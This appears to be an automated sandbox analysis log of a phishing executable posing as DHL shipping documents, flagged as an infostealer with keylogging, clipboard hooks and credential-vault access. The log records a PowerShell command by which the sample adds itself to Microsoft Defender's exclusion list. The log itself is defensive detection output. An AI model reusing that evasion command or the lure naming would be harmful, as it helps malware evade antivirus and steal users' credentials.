                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.7:49700 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49702 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49720 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49728 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49730 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49734 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Contains functionality to log keystrokes (.Net Source)
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, R1W.cs.Net Code: UlRRCLuJ
                      Installs a global keyboard hook
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                      System Summary

                      barindex
                      Malicious sample detected (through community Yara rule)
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.2204997b740.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498422b0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: Documents Of DHL -BL- AWB- 8976453410.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACCD3E600_2_00007FFAACCD3E60
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACCD1E120_2_00007FFAACCD1E12
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACCFF7780_2_00007FFAACCFF778
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACCD1E880_2_00007FFAACCD1E88
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACCD1E580_2_00007FFAACCD1E58
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACCD1E500_2_00007FFAACCD1E50
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACCD1E380_2_00007FFAACCD1E38
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACCD31F00_2_00007FFAACCD31F0
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACDE02610_2_00007FFAACDE0261
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACCD08A50_2_00007FFAACCD08A5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_015E41804_2_015E4180
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_015EA9604_2_015EA960
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_015E4A504_2_015E4A50
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_015E3E384_2_015E3E38
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_015EE5734_2_015EE573
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D551104_2_06D55110
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D51F214_2_06D51F21
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D55AF94_2_06D55AF9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D55B084_2_06D55B08
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D666504_2_06D66650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D6B27F4_2_06D6B27F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D656004_2_06D65600
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D630B84_2_06D630B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D6C1D84_2_06D6C1D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D67DE04_2_06D67DE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D623804_2_06D62380
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D677004_2_06D67700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D600404_2_06D60040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D600074_2_06D60007
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D65D374_2_06D65D37
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3812 -s 1324
                      Source: Documents Of DHL -BL- AWB- 8976453410.exeStatic PE information: No import functions for PE file found
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1449977313.0000022037EB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNativeMethods.dll" vs Documents Of DHL -BL- AWB- 8976453410.exe
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameEjoruhokaxuqegL vs Documents Of DHL -BL- AWB- 8976453410.exe
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename38212a7a-45e6-498c-8e1d-74213346066a.exe4 vs Documents Of DHL -BL- AWB- 8976453410.exe
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNativeMethods.dll" vs Documents Of DHL -BL- AWB- 8976453410.exe
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000002.1450836685.0000022049842000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameIpiximiluwuxacozepugo6 vs Documents Of DHL -BL- AWB- 8976453410.exe
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000000.1204625493.0000022037B42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNativeMethods.dll" vs Documents Of DHL -BL- AWB- 8976453410.exe
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, 00000000.00000000.1204625493.0000022037B42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameIpiximiluwuxacozepugo6 vs Documents Of DHL -BL- AWB- 8976453410.exe
                      Source: Documents Of DHL -BL- AWB- 8976453410.exeBinary or memory string: OriginalFilenameNativeMethods.dll" vs Documents Of DHL -BL- AWB- 8976453410.exe
                      Source: Documents Of DHL -BL- AWB- 8976453410.exeBinary or memory string: OriginalFilenameIpiximiluwuxacozepugo6 vs Documents Of DHL -BL- AWB- 8976453410.exe
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 4.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.2204997b740.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498422b0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Documents Of DHL -BL- AWB- 8976453410.exe, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.2204997b740.2.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, KLhJmaON.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, KLhJmaON.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, 7hO8luD.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, 9HIFdl.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Documents Of DHL -BL- AWB- 8976453410.exe.220498d36e8.3.raw.unpack, 9HIFdl.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@9/10@2/2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4132:120:WilError_03
                      Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3812
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i5rtcrf1.lba.ps1Jump to behavior
                      Source: Documents Of DHL -BL- AWB- 8976453410.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Documents Of DHL -BL- AWB- 8976453410.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: Documents Of DHL -BL- AWB- 8976453410.exeReversingLabs: Detection: 28%
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeFile read: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe"
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -Force
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 3812 -s 1324
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exe" -ForceJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
